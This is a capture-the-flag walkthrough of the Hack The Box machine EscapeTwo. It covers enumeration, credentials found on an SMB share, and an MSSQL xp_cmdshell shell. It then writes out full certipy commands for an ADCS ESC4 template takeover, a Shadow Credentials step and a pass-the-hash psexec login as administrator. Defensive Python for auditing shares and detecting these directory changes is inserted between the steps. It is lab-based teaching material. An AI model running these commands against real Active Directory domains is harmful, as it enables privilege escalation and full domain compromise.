Setup
mkdir -p ~/ctf/HackTheBox/escapetwo/scans; cd ~/ctf/HackTheBox/escapetwo
IP Address: 10.10.11.51
echo "10.10.11.51 escapetwo.htb" | sudo tee -a /etc/hosts
10.10.11.51 escapetwo.htb
Enumeration
nmap -sC -sV -Pn -p- escapetwo.htb -oN scans/nmap -vv
nmap -sC -sV -p- -T5 -vv --min-rate 2500 -oN scans/nmap_2 escapetwo.htb
# nmap findings
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2025-04-28 07:17:36Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Issuer: commonName=sequel-DC01-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-27T21:35:48
| Not valid after: 2026-04-27T21:35:48
| MD5: 2346:52c8:2638:d62f:3774:8ca0:c934:df6a
| SHA-1: 0392:dac1:1784:2df8:1f92:1efa:c143:f3d7:4efd:52c1
|_ssl-date: 2025-04-28T07:19:11+00:00; -19m58s from scanner time.
445/tcp open microsoft-ds? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Issuer: commonName=sequel-DC01-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-27T21:35:48
| Not valid after: 2026-04-27T21:35:48
| MD5: 2346:52c8:2638:d62f:3774:8ca0:c934:df6a
| SHA-1: 0392:dac1:1784:2df8:1f92:1efa:c143:f3d7:4efd:52c1
|_ssl-date: 2025-04-28T07:19:11+00:00; -19m58s from scanner time.
1433/tcp open ms-sql-s syn-ack Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-27T13:41:16
| Not valid after: 2055-04-27T13:41:16
| MD5: 4fcb:5a4e:53c7:ee55:1d4c:7a61:9688:9040
| SHA-1: 3be5:b199:6a61:a7d8:e08e:92a0:0d5c:1ffb:eb3c:86f4
| ms-sql-info:
| 10.10.11.51:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.10.11.51:1433:
| Target_Name: SEQUEL
| NetBIOS_Domain_Name: SEQUEL
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: DC01.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
|_ssl-date: 2025-04-28T07:19:14+00:00; -19m58s from scanner time.
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-04-28T07:19:11+00:00; -19m58s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Issuer: commonName=sequel-DC01-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-27T21:35:48
| Not valid after: 2026-04-27T21:35:48
| MD5: 2346:52c8:2638:d62f:3774:8ca0:c934:df6a
| SHA-1: 0392:dac1:1784:2df8:1f92:1efa:c143:f3d7:4efd:52c1
3269/tcp open ssl/ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-04-28T07:19:11+00:00; -19m58s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Issuer: commonName=sequel-DC01-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-27T21:35:48
| Not valid after: 2026-04-27T21:35:48
| MD5: 2346:52c8:2638:d62f:3774:8ca0:c934:df6a
| SHA-1: 0392:dac1:1784:2df8:1f92:1efa:c143:f3d7:4efd:52c1
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack .NET Message Framing
47001/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc syn-ack Microsoft Windows RPC
49665/tcp open msrpc syn-ack Microsoft Windows RPC
49666/tcp open msrpc syn-ack Microsoft Windows RPC
49667/tcp open msrpc syn-ack Microsoft Windows RPC
49689/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
49690/tcp open msrpc syn-ack Microsoft Windows RPC
49693/tcp open msrpc syn-ack Microsoft Windows RPC
49706/tcp open msrpc syn-ack Microsoft Windows RPC
49722/tcp open msrpc syn-ack Microsoft Windows RPC
49743/tcp open msrpc syn-ack Microsoft Windows RPC
49811/tcp open msrpc syn-ack Microsoft Windows RPC
62060/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: -19m58s, deviation: 0s, median: -19m58s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 62012/tcp): CLEAN (Timeout)
| Check 2 (port 18505/tcp): CLEAN (Timeout)
| Check 3 (port 20179/udp): CLEAN (Timeout)
| Check 4 (port 46639/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
| date: 2025-04-28T07:18:33
|_ start_date: N/A
cme smb escapetwo.htb -u 'rose' -p 'KxEPkKe6R8su' --users
# Enumerated users
ca_svc
rose
sql_svc
oscar
ryan
michael
krbtgt
Guest
Administrator
SMB Shares:
SMB 10.10.11.51 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.51 445 DC01 [+] sequel.htb\rose:KxE****************
SMB 10.10.11.51 445 DC01 [*] Enumerated shares
SMB 10.10.11.51 445 DC01 Share Permissions Remark
SMB 10.10.11.51 445 DC01 ----- ----------- ------
SMB 10.10.11.51 445 DC01 Accounting Department READ
SMB 10.10.11.51 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.51 445 DC01 C$ Default share
SMB 10.10.11.51 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.51 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.51 445 DC01 SYSVOL READ Logon server share
SMB 10.10.11.51 445 DC01 Users READ
![Pasted_image_20250428161107.png](/images/post/Pasted_image_20250428161107.png)
When I tried opening these files in Excel, it reported them as corrupt, which led me to check the file type: they are actually ZIP archives.
![Pasted_image_20250429103940.png](/images/post/Pasted_image_20250429103940.png)
Unzipping them revealed an XML file containing a table of credentials.
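The "corrupt" spreadsheets above are a file-type question: Excel rejected them because the files on the share are plain ZIP archives (a genuine .xlsx is also a ZIP, but one that carries `[Content_Types].xml`). As an added example that is not part of the original writeup, the Python below identifies a file by its magic bytes rather than its extension and lists ZIP members whose XML contains credential-like fields, which is the same check a share audit for stored passwords would run. The sample archive it builds, the file name and the list of credential tag names are constructed for the example.

```python
import os
import tempfile
import zipfile
import xml.etree.ElementTree as ET

# Leading-byte signatures (the real ones) for the two container formats
# a "spreadsheet" on a Windows share is likely to be.
MAGIC = {
    b"PK\x03\x04": "zip",                           # ZIP / OOXML (.xlsx, .docx)
    b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1": "ole2",    # legacy binary .xls/.doc
}

# Element names that usually mark a stored credential (constructed list).
SECRET_TAGS = {"password", "passwd", "pwd", "secret"}


def identify(path):
    """Return the container type implied by the file's leading bytes,
    regardless of its extension."""
    with open(path, "rb") as fh:
        head = fh.read(8)
    for sig, kind in MAGIC.items():
        if head.startswith(sig):
            if kind == "zip":
                # A real .xlsx always contains [Content_Types].xml;
                # a plain ZIP renamed to .xlsx does not.
                with zipfile.ZipFile(path) as zf:
                    if "[Content_Types].xml" in zf.namelist():
                        return "xlsx"
            return kind
    return "unknown"


def xml_members_with_secrets(path):
    """Map each XML member of the ZIP to the credential-like element
    names it contains; members without such elements are omitted."""
    hits = {}
    with zipfile.ZipFile(path) as zf:
        for name in zf.namelist():
            if not name.lower().endswith(".xml"):
                continue
            try:
                root = ET.fromstring(zf.read(name))
            except ET.ParseError:
                continue  # not well-formed XML; skip rather than crash
            tags = sorted({el.tag.split("}")[-1] for el in root.iter()
                           if el.tag.split("}")[-1].lower() in SECRET_TAGS})
            if tags:
                hits[name] = tags
    return hits


def audit(path):
    """Summarise one file: real type, whether the .xlsx extension lies,
    and which XML members hold credential-like fields."""
    kind = identify(path)
    ext = os.path.splitext(path)[1].lower().lstrip(".")
    return {
        "kind": kind,
        "extension_mismatch": ext == "xlsx" and kind != "xlsx",
        "secret_xml": xml_members_with_secrets(path) if kind in ("zip", "xlsx") else {},
    }


def build_sample(path):
    """Constructed sample: a plain ZIP (no [Content_Types].xml) saved with an
    .xlsx extension, holding one XML table that has a password column."""
    xml = (b"<?xml version='1.0'?><table>"
           b"<row><user>alice</user><password>SAMPLE-NOT-REAL</password></row>"
           b"</table>")
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr("accounts.xml", xml)
        zf.writestr("readme.txt", b"not xml")


def demo():
    """Build the constructed sample in a temp dir and audit it."""
    d = tempfile.mkdtemp()
    p = os.path.join(d, "accounts_2024.xlsx")
    build_sample(p)
    return audit(p)


if __name__ == "__main__":
    print(demo())
```

On a real share the same `audit()` can be applied to every file whose extension promises a spreadsheet; any `extension_mismatch` hit or non-empty `secret_xml` is a candidate for removal from the share and rotation of the credentials it holds.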
Using these passwords, I found two more valid credentials:
oscar:86****************
sa:MS****************
Testing them shows that sa is a sysadmin on the MSSQL instance:
![Pasted_image_20250429104318.png](/images/post/Pasted_image_20250429104318.png)
With the sa credentials we use mssqlclient's enable_xp_cmdshell command and get a reverse PowerShell shell:
In the SQL configuration file we find a password:
![Pasted_image_20250429105300.png](/images/post/Pasted_image_20250429105300.png)
A password spray shows that the same password is used by the user ryan as well:
![Pasted_image_20250429105338.png](/images/post/Pasted_image_20250429105338.png)
Enumerating services with cme shows that WinRM is enabled:
![Pasted_image_20250429111745.png](/images/post/Pasted_image_20250429111745.png)
![Pasted_image_20250429111826.png](/images/post/Pasted_image_20250429111826.png)
User Flag
Location: C:\Users\ryan\Desktop\user.txt | Flag: 1a****************
Privilege Escalation
Using the obtained credentials for ryan, we run RustHound to collect BloodHound data:
We also try Kerberoasting, but the hashes could not be cracked with rockyou.txt:
![Pasted_image_20250429145815.png](/images/post/Pasted_image_20250429145815.png)
In BloodHound we then find:
![Pasted_image_20250429150000.png](/images/post/Pasted_image_20250429150000.png)
Shadow Credentials attack: a Shadow Credentials attack is a technique attackers use to gain persistence and elevate privileges in a Windows Active Directory (AD) environment without leaving obvious traces such as new user accounts or group memberships. Instead, it abuses a legitimate feature: the msDS-KeyCredentialLink attribute used for certificate-based authentication (PKINIT for Kerberos, Windows Hello for Business). Whoever can write a key credential to that attribute on an account can then authenticate as that account.
pywhisker was used for this step:
![Pasted_image_20250429152728.png](/images/post/Pasted_image_20250429152728.png)
ca_svc:3b1****************
To check for password reuse, we spray the recovered NT hash against all enumerated usernames:
![Pasted_image_20250429152951.png](/images/post/Pasted_image_20250429152951.png)
Since the ca_svc account belongs to Certificate Publishers, we use Certipy to look for ADCS misconfigurations:
![Pasted_image_20250429161625.png](/images/post/Pasted_image_20250429161625.png)
Following ADCS Exploitation Part 1: Common Attacks, we exploit ESC4 on the DunderMifflinAuthentication template: first the template is modified, then it is used to request a certificate for the administrator.
certipy template -u ca_svc@sequel.htb -template DunderMifflinAuthentication -save-old -hashes 3b**************** -dc-ip 10.10.11.51
![Pasted_image_20250429162715.png](/images/post/Pasted_image_20250429162715.png)
certipy req -username 'ca_svc@sequel.htb' -hashes 3b**************** -ca sequel-DC01-CA -target DC01.sequel.htb -dc-ip 10.10.11.51 -template DunderMifflinAuthentication -upn administrator@sequel.htb
![Pasted_image_20250429162735.png](/images/post/Pasted_image_20250429162735.png)
certipy auth -pfx administrator.pfx -dc-ip 10.10.11.51
![Pasted_image_20250429163039.png](/images/post/Pasted_image_20250429163039.png)
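Both privilege-escalation steps above, the Shadow Credentials write to ca_svc and the ESC4 change to the DunderMifflinAuthentication template, are LDAP writes that the domain controller records as Windows Security event 5136 ("A directory service object was modified"). As an added example that is not part of the original writeup, the Python below is a small detector run over constructed 5136 events shaped after those two steps; the event dicts, the sequel.htb DNs, the list of sensitive template attributes and the "writer differs from the modified account" heuristic are assumptions of this example, not data captured from the box.

```python
import re

# Where certificate templates live in the configuration partition
# (DN suffix assumed for the sequel.htb forest).
TEMPLATE_CONTAINER = ("CN=Certificate Templates,CN=Public Key Services,"
                      "CN=Services,CN=Configuration,DC=sequel,DC=htb")

# Constructed sample events in the shape of Security event 5136, flattened
# to dicts keyed by the event's EventData field names. Values are made up.
SAMPLE_EVENTS = [
    {"EventID": 5136, "SubjectUserName": "ryan", "ObjectClass": "user",
     "ObjectDN": "CN=ca_svc,CN=Users,DC=sequel,DC=htb",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink",
     "AttributeValue": "B:828:00020000...:CN=ca_svc,CN=Users,DC=sequel,DC=htb",
     "OperationType": "%%14674"},       # %%14674 = Value Added
    {"EventID": 5136, "SubjectUserName": "ca_svc",
     "ObjectClass": "pKICertificateTemplate",
     "ObjectDN": "CN=DunderMifflinAuthentication," + TEMPLATE_CONTAINER,
     "AttributeLDAPDisplayName": "msPKI-Certificate-Name-Flag",
     "AttributeValue": "1",             # bit 0x1 = CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
     "OperationType": "%%14674"},
    {"EventID": 5136, "SubjectUserName": "ryan", "ObjectClass": "user",
     "ObjectDN": "CN=ryan,CN=Users,DC=sequel,DC=htb",
     "AttributeLDAPDisplayName": "description",
     "AttributeValue": "Helpdesk", "OperationType": "%%14674"},   # benign
]

# Template attributes whose modification can turn a safe template into an
# ESC1/ESC2/ESC3-style one, which is what an ESC4 write achieves.
RISKY_TEMPLATE_ATTRS = {
    "msPKI-Certificate-Name-Flag", "msPKI-Enrollment-Flag",
    "pKIExtendedKeyUsage", "msPKI-Certificate-Application-Policy",
    "nTSecurityDescriptor", "msPKI-RA-Signature",
}
ENROLLEE_SUPPLIES_SUBJECT = 0x1
VALUE_ADDED = "%%14674"


def object_name(dn):
    """First RDN value of a DN ("CN=ca_svc,CN=Users,..." -> "ca_svc")."""
    m = re.match(r"CN=([^,]+)", dn, re.IGNORECASE)
    return m.group(1) if m else dn


def classify(ev):
    """Return a list of alert strings for one 5136 event (empty = benign)."""
    alerts = []
    if ev.get("EventID") != 5136:
        return alerts
    attr = ev["AttributeLDAPDisplayName"]
    dn = ev["ObjectDN"]
    who = ev["SubjectUserName"]

    # Shadow credentials: a key credential added to an account by a principal
    # other than the account itself. Heuristic chosen for this example;
    # legitimate Windows Hello enrolment also writes this attribute.
    if attr.lower() == "msds-keycredentiallink" and ev["OperationType"] == VALUE_ADDED:
        if who.lower() != object_name(dn).lower():
            alerts.append(f"shadow-credentials: {who} added a key credential "
                          f"to {object_name(dn)}")

    # ESC4: a sensitive attribute of a certificate template was changed.
    if dn.lower().endswith(TEMPLATE_CONTAINER.lower()) and attr in RISKY_TEMPLATE_ATTRS:
        detail = f"esc4: {who} changed {attr} on template {object_name(dn)}"
        if attr == "msPKI-Certificate-Name-Flag":
            try:
                flags = int(ev["AttributeValue"])   # 5136 logs integers as decimal text
            except ValueError:
                flags = 0
            if flags & ENROLLEE_SUPPLIES_SUBJECT:
                detail += " (ENROLLEE_SUPPLIES_SUBJECT set: requesters choose the UPN)"
        alerts.append(detail)
    return alerts


def scan(events):
    """Run classify() over a batch and return every alert in event order."""
    return [a for ev in events for a in classify(ev)]


if __name__ == "__main__":
    for line in scan(SAMPLE_EVENTS):
        print(line)
```

Event 5136 is only written when the "Audit Directory Service Changes" subcategory is enabled and the object's SACL covers the write, so both conditions need checking before relying on this rule. On the CA host itself, events 4899 (template updated) and 4900 (template security updated) corroborate an ESC4 change; the response is to restore the template from its saved pre-change state and review which principals hold write rights on it, and for the shadow-credentials case to clear the unexpected key credential and reset the affected account.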
Using the administrator hash with psexec we get a shell:
impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:7a8d4**************** -target-ip 10.10.11.51 administrator@sequel.htb
![Pasted_image_20250429163513.png](/images/post/Pasted_image_20250429163513.png)
Root Flag
Location: c:\Users\Administrator\Desktop\root.txt | Flag: 85b****************